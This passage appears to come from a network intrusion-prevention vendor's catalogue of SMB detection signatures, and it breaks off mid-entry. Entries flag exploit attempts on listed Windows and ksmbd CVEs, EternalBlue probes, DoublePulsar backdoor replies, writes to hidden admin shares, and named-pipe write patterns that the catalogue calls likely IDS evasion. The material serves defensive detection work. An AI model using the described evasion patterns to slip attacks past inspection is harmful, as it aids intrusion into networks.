Back to top

SMB-TCP_SHS-Write-And-Unlock-Fail

About this situation: Unsuccessful Samba Write And Unlock reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-And-Unlock-Success

About this situation: Successful Samba Write And Unlock reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-AndX-Fail

About this situation: Unsuccessful Samba Write AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-AndX-Success

About this situation: Successful Samba Write AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Bulk-Data-Fail

About this situation: Unsuccessful Samba Write Bulk Data reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Bulk-Data-Success

About this situation: Successful Samba Write Bulk Data reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Bulk-Fail

About this situation: Unsuccessful Samba Write Bulk reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Bulk-Success

About this situation: Successful Samba Write Bulk reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Complete-Fail

About this situation: Unsuccessful Samba Write Complete reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Complete-Success

About this situation: Successful Samba Write Complete reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Fail

About this situation: Unsuccessful Samba Write reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-MPX-Fail

About this situation: Unsuccessful Samba Write MPX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-MPX-Secondary-Fail

About this situation: Unsuccessful Samba Write MPX Secondary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-MPX-Secondary-Success

About this situation: Successful Samba Write MPX Secondary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-MPX-Success

About this situation: Successful Samba Write MPX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Print-File-Fail

About this situation: Unsuccessful Samba Open Print File reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Print-File-Success

About this situation: Successful Samba Open Print File reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Raw-Fail

About this situation: Unsuccessful Samba Write Raw reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Raw-Success

About this situation: Successful Samba Write Raw reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-Success

About this situation: Successful Samba Write reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SMB-Client-Memory-Allocation-CVE-2010-0269

About this situation: An attempt to exploit CVE-2010-0269 detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-300-4219
Vulnerability: SMB-Client-Memory-Allocation-CVE-2010-0269
Description:
Back to top

SMB-TCP_SMB-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2011-02, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_SMB-Search-Buffer-Overflow-MS08-063

About this situation: SMB Search Request Buffer Overflow MS08-063
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-10, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-179-2032
Vulnerability: Microsoft-Windows-SMB-Service-Buffer-Overflow-MS08-063
Description:
Back to top

SMB-TCP_SS-Echo-Response-Fail

About this situation: SMB echo response with error code set detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SS-Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333
Description:
Back to top

SMB-TCP_SS-Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Microsoft Windows File Explorer detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Explorer, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal
Description:
Back to top

SMB-TCP_SS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption

About this situation: A helper situation to detect exploits against SMB vulnerability CVE-2017-0143
Context: TCP SMB Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-931-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
Description:
Back to top

SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-08, CVE2022, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1500-5242
Vulnerability: Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
Description:
Back to top

SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-08, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1500-5242
Vulnerability: Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
Description:
Back to top

SMB-TCP_SS-Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-06, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1256-5242
Vulnerability: Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284
Description:
Back to top

SMB-TCP_SS-Trans2-DoublePulsar-Response

About this situation: A DoublePulsar Backdoor Reply was detected
Context: TCP SMB Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-911-5242
Last changed: sgpkg-ips-912-5242
Vulnerability: DoublePulsar-Backdoor
Description:
Back to top

SMB-TCP_Suspicious-Server-Response

About this situation: A suspicious SMB server response detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: Generic-SMB-Exploit
Description:
Back to top

SMB-TCP_Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2022, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690
Description:
Back to top

SMB-TCP_VMware-ESXi-Authentication-Bypass-CVE-2024-37085

About this situation: An attempt to exploit a vulnerability in EMC VMware ESXi Server detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware ESXi Server, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1767-5242
Last changed: sgpkg-ips-1767-5242
Vulnerability: VMware-ESXi-Authentication-Bypass-CVE-2024-37085
Description:
Back to top

SMB-TCP_Windows-Explorer-HTA-CLSID-System-Compromise

About this situation: Detects attempts to exploit the Windows Explorer HTA vulnerability over SMB
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, x86, MS2006-08, CVE2006, Windows 2003 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-75-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Windows-Explorer-HTA-CLSID-System-Compromise
Description:
Back to top

SMB-TCP_Windows-Filename-Parsing-Vulnerability-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-12, CVE2012, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Windows-Filename-Parsing-Vulnerability-CVE-2012-4774
Description:
Back to top

SMB-TCP_Windows-Named-Pipe-Execution-Status-Unset

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-931-5242
Vulnerability: EternalBlue-Probe
Description:
Back to top

SMB-TCP_Windows-Search-Protocol-Named-Pipe-MsFteWds

About this situation: A Windows Search Protocol message detected
Context: TCP SMB Client Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-931-5242
Description:
Back to top

SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2017-06, CVE2017, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543
Description:
Back to top

SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2017-06, CVE2017, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-956-5242
Vulnerability: Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543
Description:
Back to top

SMB-TCP_Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660

About this situation: An exploit against CVE-2011-0660 detected
Context: TCP SMB Server Stream
Severity: 2
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660
Description:
Back to top

SMB-TCP_Windows-SMB-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Windows-SMB-Remote-Code-Execution-Vulnerability
Description:
Back to top

SMB2

About this situation: SMB2 traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1665-5242
Description: SMB version 2 (SMB2) usage. SMB is a protocol that provides access to shared resources, for example files and printers, over the network.
Back to top

SMB2_Invalid-Tree-Identifier

About this situation: SMB 2 data transfer with invalid tree identifier detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: Data transfer occurred in SMB 2 protocol using a tree identifier not matching the existing state information.
Back to top

SMB2_Message-After-SMB-Negotiated

About this situation: SMB2 message seen after SMB1 was negotiated
Context: SMB without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 2 message was seen on the connection after SMB 1 had been negotiated.
Back to top

SMB2_Named-Pipe-Failed-Write

About this situation: Failed SMB 2 write to a named pipe detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 2 write to a named pipe failed. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Named-Pipe-Mid-Pipeline-Failed-Write

About this situation: Failed SMB 2 write to a named pipe detected in the middle of a pipeline of multiple named pipe writes
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 2 write to a named pipe failed while there are other outstanding writes to the same named pipe. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Named-Pipe-Write-After-Failed-Write

About this situation: SMB 2 write to a named pipe after a failed write detected
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 2 write to a named pipe failed, and subsequently the same named pipe was written to again. This is likely an attempted IPS/IDS evasion. It is recommended that this situation is terminated.
Back to top

SMB2_Named-Pipe-Write-Pipeline-Overflow

About this situation: Outstanding unreplied SMB 2 named pipe write request limit reached
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: A limit for the supported number of outstanding unreplied SMB 2 named pipe write requests was reached. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Named-Pipe-Write-Pipeline-Underflow

About this situation: SMB 2 named pipe write reply was detected when there was no matching named pipe write request
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 2 named pipe write reply was detected but the matching named pipe write request has not been seen. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Named-Pipe-Write-Pipelining

About this situation: SMB 2 named pipe write pipelining detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: There are two or more outstanding writes to an SMB 2 named pipe. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Negotiated

About this situation: SMB protocol version 2 negotiated
Context: SMB without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: SMB protocol version 2 was negotiated.
Back to top

SMB2_Request-Pipeline-Overflow

About this situation: SMB2 request pipeline overflow
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: A limit for the supported number of outstanding unreplied SMB 2 requests was reached. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Unknown-File-Identifier

About this situation: SMB 2 data transfer with unknown file identifier detected
Context: SMB without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: Data transfer occurred in SMB 2 protocol using a file identifier without existing state information. This is either an SMB 2 anomaly or a result of memory exhaustion in the inspection engine. In the latter case the fingerprinting for this connection may be incomplete.
Back to top

SMB2_Unknown-Message-Identifier

About this situation: SMB 2 response with no matching request was detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 2 response message was detected with a MessageId for which the matching request has not been seen. This may be an attempted IPS/IDS evasion.
Back to top

SMB2_Unknown-Tree-Identifier

About this situation: SMB2 data transfer with unknown tree identifier detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: Data transfer occurred in SMB 2 protocol using a tree identifier without existing state information. This is either an SMB 2 anomaly or a result of memory exhaustion in the inspection engine. In the latter case the fingerprinting for this connection may be incomplete.
Back to top

SMB3

About this situation: SMB3 traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1665-5242
Description: SMB version 3 (SMB3) usage. SMB is a protocol that provides access to shared resources, for example files and printers, over the network.
Back to top

SMB_Attempted-Tree-Connect-To-ADMIN$

About this situation: Attempted SMB Tree Connect to share ADMIN$
Context: SMB without parameters
Severity: 1
Tags: Potential Probe
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol tree connect to the hidden share "ADMIN$" was detected.
Back to top

SMB_Attempted-Tree-Connect-To-C$

About this situation: Attempted SMB Tree Connect to share C$
Context: SMB without parameters
Severity: 1
Tags: Potential Probe
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol tree connect to the hidden share "C$" was detected.
Back to top

SMB_Attempted-Tree-Connect-To-D$

About this situation: Attempted SMB Tree Connect to share D$
Context: SMB without parameters
Severity: 1
Tags: Potential Probe
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol tree connect to the hidden share "D$" was detected.
Back to top

SMB_Attempted-Tree-Connect-To-Other

About this situation: Attempted SMB Tree Connect
Context: SMB without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol tree connect to a share other than "ADMIN$", "C$", or "D$" was detected.
Back to top

SMB_Attempted-Write-To-ADMIN$

About this situation: Attempted SMB write to share ADMIN$
Context: SMB without parameters
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol write to the hidden share "ADMIN$" was detected.
Back to top

SMB_Attempted-Write-To-C$

About this situation: Attempted SMB write to share C$
Context: SMB without parameters
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol write to the hidden share "C$" was detected.
Back to top

SMB_Attempted-Write-To-D$

About this situation: Attempted SMB write to share D$
Context: SMB without parameters
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol write to the hidden share "D$" was detected.
Back to top

SMB_Attempted-Write-To-Other

About this situation: Attempted SMB write to a share
Context: SMB without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempted SMB or SMB2 protocol write to a share other than "ADMIN$", "C$", or "D$" was detected.
Back to top

SMB_Command-Pipeline-Overflow

About this situation: Outstanding unreplied SMB request limit reached
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-454-4333
Description: A limit for the supported number of outstanding unreplied SMB requests was reached. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Command-Pipeline-Underflow

About this situation: SMB reply was detected when there was no matching request
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-684-5211
Description: An SMB reply was detected but the matching request has not been seen. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Message-After-SMB2-Negotiated

About this situation: SMB1 message seen after SMB2 was negotiated
Context: SMB without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: An SMB 1 message was seen after SMB 2 had been negotiated on the connection.
Back to top

SMB_Named-Pipe-Failed-Write

About this situation: Failed SMB write to a named pipe detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-454-4333
Description: An SMB write to a named pipe failed. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Named-Pipe-Large-Write

About this situation: SMB large write to a named pipe detected
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-600-5211
Description: A large >65535-byte write occurred in SMB protocol to a named pipe. While large writes into files are common, large writes into named pipes are rare. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Named-Pipe-Mid-Pipeline-Failed-Write

About this situation: Failed SMB write to a named pipe detected in the middle of a pipeline of multiple named pipe writes
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-442-4219
Description: An SMB write to a named pipe failed while there are other outstanding writes to the same named pipe. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Named-Pipe-Write-After-Failed-Write

About this situation: SMB write to a named pipe after a failed write detected
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-442-4219
Description: An SMB write to a named pipe failed, and subsequently the same named pipe was written to again. This is likely an attempted IPS/IDS evasion. It is recommended that this situation is terminated.
Back to top

SMB_Named-Pipe-Write-Pipeline-Overflow

About this situation: Outstanding unreplied SMB named pipe write request limit reached
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-454-4333
Description: A limit for the supported number of outstanding unreplied SMB named pipe write requests was reached. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Named-Pipe-Write-Pipeline-Underflow

About this situation: SMB named pipe write reply was detected when there was no matching named pipe write request
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-454-4333
Description: An SMB named pipe write reply was detected but the matching named pipe write request has not been seen. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Named-Pipe-Write-Pipelining

About this situation: SMB named pipe write pipelining detected
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-454-4333
Description: There are two or more outstanding writes to an SMB named pipe. This may be an attempted IPS/IDS evasion.
Back to top

SMB_Negotiated

About this situation: SMB protocol version 1 negotiated
Context: SMB without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Description: SMB protocol version 1 was negotiated.
Back to top

SMB_Successful-Write-To-ADMIN$

About this situation: Successful SMB write to share ADMIN$
Context: SMB without parameters
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: A successful SMB or SMB2 protocol write to the hidden share "ADMIN$" was detected.
Back to top

SMB_Successful-Write-To-C$

About this situation: Successful SMB write to share C$
Context: SMB without parameters
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: A successful SMB or SMB2 protocol write to the hidden share "C$" was detected.
Back to top

SMB_Successful-Write-To-D$

About this situation: Successful SMB write to share D$
Context: SMB without parameters
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: A successful SMB or SMB2 protocol write to the hidden share "D$" was detected.
Back to top

SMB_Successful-Write-To-Other

About this situation: Successful SMB write to a share
Context: SMB without parameters
